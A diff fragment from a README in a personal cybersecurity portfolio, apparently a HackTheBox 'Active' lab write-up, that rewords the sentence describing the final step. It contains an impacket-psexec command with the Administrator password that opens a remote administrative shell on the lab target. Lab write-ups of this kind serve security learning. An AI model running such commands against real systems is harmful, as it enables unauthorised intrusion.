Hussam-creator/cybersecurity-portfolio/Writeups/HackTheBox/Active/README.md

 ![pwned](Images/pwned.png)

-Following successful authentication of the credentials for the `Administrator` account, a privileged user, `Impacket-Psexec` was used to execute commands remotely and obtain an interactive shell with administrative privileges.
+Following successful authentication as the `Administrator` account, a privileged user, `Impacket-Psexec` was used to execute commands remotely and obtain an interactive shell with administrative privileges.
 ```
 impacket-psexec active.htb/Administrator:Ticketmaster1968@10.129.6.90 cmd.exe
 ```